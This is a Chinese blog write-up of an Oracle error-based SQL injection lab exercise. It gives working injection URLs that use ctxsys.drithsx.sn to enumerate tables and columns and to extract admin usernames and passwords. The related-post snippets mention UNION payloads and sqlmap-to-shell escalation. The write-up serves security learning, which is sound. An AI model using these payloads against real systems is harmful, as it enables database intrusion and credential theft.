[zkaq靶场]SQL注入--Oracle报错注入

最新推荐文章于 2024-02-18 14:41:34 发布
最新推荐文章于 2024-02-18 14:41:34 发布
阅读量452 收藏 1
点赞数 1
分类专栏: zkaq靶场 文章标签: sql sql注入 Oracle 渗透测试 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116545053
版权

SQL注入–Oracle报错注入

SQL注入回顾:网络安全笔记-99-渗透-SQL注入

Oracle中用户的概念相当于库的概念。

select * from all_tables:查询所有的表

select * from user_tables:查询当前用户的所有表

select * from all_tab_columns查询所有的字段

select * from user_tab_columns:查询当前用户的所有表

select * from v$version:查询版本

意外插入:SQL语句的执行顺序:

​ 5.SELECT [DISTINCT] 分组字段[别名]…统计函数…;

​ 1.FROM

​ 2.WHERE [不可以使用统计函数]

​ 3.GROUP BY 分组字段

​ 4.HAVING 分组后的过滤条件 [可以使用统计函数]

​ 6.ORDER BY 排序字段 ASC|DESC

伪列:

ROWNUM(行号):SELECT ROWNUM,ENAME,EMPNO,JOB FROM EMP;自动编号是动态生成的,不是固定的。

在Oracle中,ROWNUM 可以做以下两件事:

​ 1.取出第一行记录:SELECT * FROM EMP WHERE ROWNUM = 1;(只有第一行能用)

​ 2.取出前N行记录:SELECT ROWNUM,EMPNO,ENAME,JOB FROM EMP WHERE ROWNUM<=10;

取出6~10条记录:(分页操作)

SELECT * FROM(SELECT ROWNUM RN,EMPNO,ENAME,JOB

​ FROM EMP

​ WHERE ROWNUM <=10) TEMP //(currentPage*lineSize)(currentPage=2)当前显示的页数,取出五行记录相当于每页显示的条数(lineSize=5)

WHERE TEMP.RN >5; //(currentPage-1)*lineSize

不等于:

and 字段名<>字段值 (一个条件,查询时排除符合条件的数据 当字段名中字段值符合数据就排除符合这个条件的数据)

eg: and TABLE_NAME<>‘DUAL’

查询时符合table_name字段中值为DUAL的整条数据都会被排除

报错

CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))

去查询关于主题的对应关键词,然后因为查询失败(应该是这个用户没有创建和查询的权限,默认情况没有创建,爆出未查询到的错误从而爆出查询的内容)

and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))–

:查询数据库版本

为什么需要1=?

因为Oracle的语言严谨,where后面跟的都是条件,单独的字符串不能作为条件,比较才能作为条件,存在的字段名等于这个字符串也可以作为条件。

select table_name from user_tables where rownum=1 查询表名

select column_name from user_tab_columns where table_name=‘ADMIN’ and rownum=1 查询字段名

select column_name from user_tab_columns where table_name=‘ADMIN’ and column_name<>‘ID’ and rownum=1 – 查第二个字段

靶场

查表名:

  • http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))

image-20210315233436772

  • http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where table_name <>‘ADMIN’ and rownum=1))

image-20210315233838643

  • http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum rn,table_name from user_tables where rownum<5) where rn=3))

image-20210315235924702

select table_name from (select rownum rn,table_name from user_tables where rownum<3) where rn=2

查字段:

  • http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum rn,column_name from user_tab_columns where table_name=‘ADMIN’ and rownum<5) where rn=1))

image-20210316000410146

image-20210316000432052

查数据:

http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(1,(select res from (select rownum rn,concat(uname,upass) res from admin where rownum<5) where rn=2))

image-20210316001649496

wwxxee
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
portswigger之SQL注入实验室笔记
m0_69349614的博客
07-06 1215
该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。这种攻击的第一步是确定查询返回的列数。然后,您将在后续实验中使用此技术来构建完整的攻击。要解决该实验,请通过执行SQL 注入 UNION攻击来确定查询返回的列数,该攻击会返回包含空值的附加行。'+ORDER+BY+3--'+UNION+SELECT+NULL,NULL,NULL--该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因
手注Oracle墨者靶场案例
weixin_48563815的博客
05-03 1746
判断注入点 通过判断?id=1 and 1=1 正确 ?id=1 and 1=2 错误 确定是个数字型注入点 判断列数 通过?id=1 order by 2-- 判断出存在两列数据 注意Oracle闭合后面语句的是 -- 判断字符类型 oracle自带虚拟表dual,oracle的查询语句必须完整的包含from字句,且每个字段的类型都要准确对应,一般使用null来判断类型。 例:?id=1 and 1=2 union select 'null','null' from dual 返回正常 a
oracle报错注入 user,SQL注入靶场Oracle 报错注入
weixin_42531163的博客
04-03 201
打开靶场链接后,按照提示,URL后面加上id参数,再访问,如下:image.png用id=1' 进行注入测试,出现了报错,从报错提示可看出,该数据库Oracleimage.png用id=1' --+ 再测试,则正常显示:image.png下面尝试使用报错注入让想要查询的数据回显在Oracle的报错信息中。使用 1=ctxsys.drithsx.sn(1,(select table_name fr...
104.[提高班]网络渗透靶场Oracle+phpStudy本地搭建万字详解1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。提高篇:(自学系
oracle备忘录-注入
ask_man的专栏
06-12 509
1:枚举数据库配置信息 banb
SQL注入 ——sql数据库操作基础(一)
Gjqhs的博客
02-16 1524
实验目的 熟悉 MySQL( MariaDB)薮据库的基础与进阶语法,加深对SQL命令语句的理解, 为后续SQL注入攻击与防护实验打下坚实的基础。 实验环境 (1)操作系统: Centos7 (2)安装的应用软件: Apache、 MySQL( MariaDB)、PHP;DWA、 SQLi-Labs Debug3.0漏洞网站环境 MySQL( MariaDB)数据库帐号root,密码为空 实验原理 MySQL( MariaDB)数据库基本命令的功能 实验步骤 第一部分: MySQL(
Oracle数据库注入全方位利用
weixin_42508548的博客
11-24 715
渗透测试过程中,总是遇到不熟悉的数据库,知道了有SQL注入漏洞但是无法利用,这总让我很苦恼。因为网上的文章很多都是基于Mysql数据库的,当遇到Oracle数据库时有些数据库层面的不同点对于我们测试总会有点困扰,无法成功利用。故学习了Oracle数据库注入的相关知识,在此总结分享给大家,希望能够对安全从业人员有所帮助。 全文基于对于SQL注入具有一定理解,并且能够在Mysql数据库进行注入的基础上进行阐述。本文旨在讲述Oracle数据库多种情况下如何进行注入,注重实战,相关概念问题请自
web-报错注入-皮卡丘靶场
07-15
在"皮卡丘靶场"中,我们看到了几种不同的报错注入技巧。 首先,`updatexml()`函数被用来测试和提取数据库信息。`updatexml(1,expression,1)`通常是一个无效的操作,因为第一个参数为1,而XML文档需要一个XML格式的...
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
mysql注入-sqlilabs靶场注入
10-15
MySQL注入是一种常见的网络安全漏洞,主要发生在应用程序中,当用户输入的数据未经充分验证或过滤就直接用于构造SQL查询时。SQL注入攻击者可以利用这个漏洞执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,...
sql靶场通关8-10
09-24
sql靶场8-10详解
oracle靶场,网络靶场_在线网络安全学习平台|合天智汇
weixin_42415451的博客
04-11 260
前言Shiro这个词最近在安全圈挺火的,我是第一次接触到这个,所以Apache发漏洞通告的时候还是给我整的有点懵。在看师傅们的复现时也感到有点吃力,因此整理了下关于这个漏洞的相关知识点,写了点自己的理解以供还未接触过这个知识点的同学们参考,同时也给今后复习留下参考。个人水平有限,可能存在理解偏差,请路过的大佬们指正。cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容...
sql注入mysql判断_SQL注入判断数据库类型
weixin_36116139的博客
01-30 2437
SQL注入首先会判断服务端数据库的类型,通过已知不同数据库的一些特性,便于后续进一步渗透测试一般来说SQL注入存在的四个语句“SELECT/UPDATE/INSERT/DELETE”,增删改查,通过一些参数带入SQL执行语句中,再通过拼凑等方式获取更多的信息0x00 常见网页类型对应数据库关系asp : Access/SQLServerphp : Mysqljsp : Oracle0x...
自己搭建sql注入靶场sqlmap脚本利用
Bu2n的博客
01-12 1409
搭建环境数据库准备工作靶场第一关靶场第二关sqlmap脚本编写运用脚本参考资料 搭建环境 Debian10.x apache2 MariaDB10.x php7.3 环境搭建可参考 https://blog.csdn.net/weixin_43623271/article/details/122372456 数据库准备工作 下面的操作可以根据自己的喜好更改,如数据库名字,表名,记录,用户名(也可以用root),总之可以随便改 创建一个test数据库 创建一个class数据表 插入几条数据 .
sqlmap注入oracle库,2020-04-01 sqlmap注入神器SQLMap工具技巧
weixin_39966053的博客
04-07 1257
sqlmap.py -u http://192.168.0.108/sqlserver/1.aspx?xxser=1sqlmap.py -uhttp://192.168.0.108/sqlserver/1.aspx?xxser=1 --leve=3–-level=LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当...
WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场
m0_65336233的博客
10-09 1652
WEB攻防-通用漏洞&SQL注入
小迪安全26WEB 攻防-通用漏洞&SQL 注入 &Sqlmap&Oracle&Mongodb&DB2 等
最新发布
weixin_73760178的博客
02-18 1208
通过sqlmap找到管理员账号和密码,从而登入后台,再利用后台进行os-shell的连接实现shell交互,此时通过shell交互便可获取到对方服务器的IP等敏感信息,同时,在自己的服务器中开启监听,利用高级权限读写文件,向对服务器写入payload(.exe)并运行,实现上线服务器,然后在监听过程中开启msf,从而提权。猜回显位:用的是单引号,进行猜测,因为在数据库中加入单引号是一种字符类型的,通过SQL语句,判断之后的数据是否能正常的显示页面,从而进行判断注入点。测回显:/new_list.php?
Oracle/PL/SQL数据库基础操作(持续更新)
热门推荐
zh94264的博客
02-26 1万+
Oracle基本操作,增删改查~
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名和密码,点击登录按钮。 2. 在浏览器中按F12打开开发者工具,切换到Network选项卡。 3. 再次点击登录按钮,查看POST请求的数据包。 4. 将POST请求的数据包复制到Burp Suite等代理工具中。 5. 在代理工具中修改用户名为:admin'--,密码随意填写。 6. 发送修改后的数据包,即可成功登录管理员账户。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值